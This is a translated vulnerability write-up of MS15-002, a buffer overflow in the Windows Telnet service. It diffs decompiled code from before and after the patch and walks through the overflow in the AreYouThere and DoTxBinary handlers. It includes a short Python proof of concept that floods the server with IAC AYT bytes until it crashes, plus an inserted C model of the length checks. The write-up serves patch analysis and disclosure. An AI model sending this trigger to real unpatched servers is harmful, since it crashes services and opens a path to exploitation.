Nytro

MS15-002 telnet service buffer overflow vulnerability analysis and POC structure


2015/01/16 9:09 | cssembly | binary security, vulnerability analysis

0x00 Vulnerability analysis


MS15-002 is a buffer overflow vulnerability in the Microsoft Telnet service. Below, its root cause is analyzed and a POC is constructed.

The Telnet service process is tlntsvr.exe; for each client connection it starts a corresponding tlntsess.exe process. The patch modifies tlntsess.exe, and diffing the patched file against the original locates the vulnerability in the following function:

    signed int __thiscall CRFCProtocol::ProcessDataReceivedOnSocket(CRFCProtocol *this, unsigned __int32 *a2)

[screenshot]

Before the patch, the function looks like this:

[screenshot: function before the patch]

After the patch, the function looks like this:

[screenshot: function after the patch]

That is, one buffer was split into two. After the call

    (*(void (__thiscall **)(CRFCProtocol *, unsigned __int8 **, unsigned __int8 **, unsigned __int8))((char *)&off_1011008 + v12))(v2, &v13, &v9, v6)

returns, the length of the data in the buffer is checked first: if

    (unsigned int)(v9 - (unsigned __int8 *)&Src - 1) <= 0x7FE

holds, the code then checks whether the target buffer can hold that many characters: if

    (unsigned int)((char *)v14 + v7 - (_DWORD)&Dst) >= 0x800

the function exits; otherwise

    memcpy_s(v14, (char *)&v18 - (_BYTE *)v14, &Src, v9 - (unsigned __int8 *)&Src)

copies the data into the Dst buffer.

Before the patch there was only one buffer, and the call

    (*(&off_1011008 + 3 * v7))(v3, &v14, &v13, *v6)

was made with no check of the data length in the buffer other than the condition v13 - &Src <= 2048, where v13 points to the first free byte of the buffer. The function invoked by

    (*(&off_1011008 + 3 * v7))(v3, &v14, &v13, *v6)

modifies the value of v13. If the call dispatches to the

    void __thiscall CRFCProtocol::DoTxBinary(CRFCProtocol *this, unsigned __int8 **a2, unsigned __int8 **a3, unsigned __int8 a4)

function, it can be seen that the function changes the value of parameter 3, i.e. *a3 += 3.

[screenshot: CRFCProtocol::DoTxBinary]

From this analysis it follows that when v13 - &Src = 2047, the condition v13 - &Src <= 2048 is still satisfied; if (*(&off_1011008 + 3 * v7))(v3, &v14, &v13, *v6) then dispatches to CRFCProtocol::DoTxBinary, the following instruction sequence executes and clearly overflows the buffer.

    v7 = *a3;        // a3: pointer to the output cursor into the buffer
    *v7 = -1;        // 0xFF (IAC)
    v7[1] = -3;      // 0xFD (DO)
    v7[2] = a4;
    v7[3] = 0;       // four bytes written in total...
    *a3 += 3;        // ...while the cursor advances by three

In the patched version two buffers are used, and the pointer to the temporary buffer is passed as v9:

    (*(void (__thiscall **)(CRFCProtocol *, unsigned __int8 **, unsigned __int8 **, unsigned __int8))((char *)&off_1011008 + v12))(v2, &v13, &v9, v6)

After the function returns, the length of the data in the buffer pointed to by v9 is checked, and finally the code checks whether the destination buffer has enough free space for the data remaining in the v9 buffer, namely the (unsigned int)((char *)v14 + v7 - (_DWORD)&Dst) >= 0x800 check.

0x01 Environment setup and POC construction


Install and start the Telnet server on Windows 7, run net user exp 123456 /ADD to add the user exp, and run net localgroup TelnetClients exp /ADD to add that user to the TelnetClients group, so that it can log in through a telnet client.

Debugging shows that in

    signed int __thiscall CRFCProtocol::ProcessDataReceivedOnSocket(CRFCProtocol *this, unsigned __int32 *a2)

a2 is the length of the received data, at most 0x400, and v6 points to the received data. To trigger the overflow, (*(&off_1011008 + 3 * v7))(v3, &v14, &v13, *v6) must clearly dispatch to a handler that expands the data, so that after processing the data in the Src buffer exceeds 0x800 bytes.

[screenshot]

Looking at the functions that (*(&off_1011008 + 3 * v7))(v3, &v14, &v13, *v6) can dispatch to,

    void __thiscall CRFCProtocol::AreYouThere(CRFCProtocol *this, unsigned __int8 **a2, unsigned __int8 **a3, unsigned __int8 a4)

clearly expands the data: a4 is one byte of the received data, and after execution 9 bytes of fixed data have been written into the buffer pointed to by a3.

[screenshot: CRFCProtocol::AreYouThere]
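To make the check ordering concrete, here is an added C model (not code from the original article or from tlntsess.exe) of the two behaviours the analysis describes: the pre-patch loop that only guards with v13 - &Src <= 0x800 before the handler writes, and the patched path that writes into a temporary buffer and runs both length checks before memcpy_s. The 9-byte reply content, the one-handler-call-per-IAC-AYT-pair loop structure and the slack in the model buffer are assumptions made for the model, not facts from the decompilation.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define BUF_SIZE 0x800   /* size of the Src/Dst stack buffers in the decompilation */
#define AYT_LEN  9       /* AreYouThere emits 9 fixed bytes per IAC AYT (per the analysis) */

/* Constructed stand-in for the 9-byte reply; the real bytes are not on the page. */
static const uint8_t ayt_reply[AYT_LEN] = { 'A','Y','T','-','R','E','P','L','Y' };

/* Handler model: write the reply at *out and advance the cursor (cf. DoTxBinary's *a3 += 3). */
static void are_you_there(uint8_t **out) {
    memcpy(*out, ayt_reply, AYT_LEN);
    *out += AYT_LEN;
}

/* Pre-patch model: one buffer; "v13 - &Src <= 0x800" is checked BEFORE the handler runs,
 * so the handler's own bytes are never bounded. `pairs` = number of IAC AYT pairs received.
 * Returns how many bytes land past the end of the 0x800 buffer (0 = no overflow). */
size_t prepatch_overflow(size_t pairs) {
    uint8_t buf[BUF_SIZE + 64];              /* slack so the model itself stays in bounds */
    uint8_t *v13 = buf;
    for (size_t i = 0; i < pairs; i++) {
        if ((size_t)(v13 - buf) > BUF_SIZE) break;   /* the only pre-patch guard */
        are_you_there(&v13);
    }
    size_t end = (size_t)(v13 - buf);
    return end > BUF_SIZE ? end - BUF_SIZE : 0;
}

/* Patched model: the handler writes into a temp buffer (v9); both length checks run
 * before memcpy_s copies into Dst (v14). Returns bytes accepted into Dst and sets
 * *rejected when the "(v14 + v7 - &Dst) >= 0x800" exit path is taken. */
size_t patched_accepted(size_t pairs, bool *rejected) {
    uint8_t src[BUF_SIZE], dst[BUF_SIZE];
    uint8_t *v14 = dst;
    *rejected = false;
    for (size_t i = 0; i < pairs; i++) {
        uint8_t *v9 = src;
        are_you_there(&v9);                   /* write goes to the temp buffer only */
        size_t v7 = (size_t)(v9 - src);       /* bytes the handler produced */
        if (v7 - 1 > 0x7FE) { *rejected = true; break; }                    /* first check */
        if ((size_t)(v14 - dst) + v7 >= BUF_SIZE) { *rejected = true; break; } /* second */
        memcpy(v14, src, v7);                 /* memcpy_s(v14, &v18 - v14, &Src, v7) */
        v14 += v7;
    }
    return (size_t)(v14 - dst);
}
```

With 0x200 pairs, as in the POC below, the pre-patch model writes past the 0x800 buffer while the patched model stops at 2043 accepted bytes and takes the exit path.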

After capturing packets with Wireshark and doing a simple protocol analysis, the POC is constructed as follows; it makes the program call CRFCProtocol::AreYouThere repeatedly and eventually triggers an exception.

    import socket

    address = ('192.168.172.152', 23)      # Telnet server under test
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(address)
    data = b"\xff\xf6" * 0x200             # IAC AYT (Are You There) repeated 0x200 times; bytes literal also runs on Python 3
    s.send(data)
    s.recv(512)
    s.close()

Run the POC with a breakpoint set at

    signed int __thiscall CRFCProtocol::ProcessDataReceivedOnSocket(CRFCProtocol *this, unsigned __int32 *a2)

After it breaks, a2 = 0x400 and (DWORD)((DWORD *)(this + 0x1E40) + 0x16c8) points to the received data.

[screenshot: debugger at the breakpoint]

Set a breakpoint before the function returns; after it executes, __security_check_cookie detects the stack overflow and raises an exception, breaking into the debugger.

[screenshot: __security_check_cookie exception in the debugger]

Disclaimer: unauthorized reproduction prohibited. cssembly @ WooYun Knowledge Base

Source: https://translate.google.com/translate?sl=auto&tl=en&js=y&prev=_t&hl=en&ie=UTF-8&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F4621&edit-text=
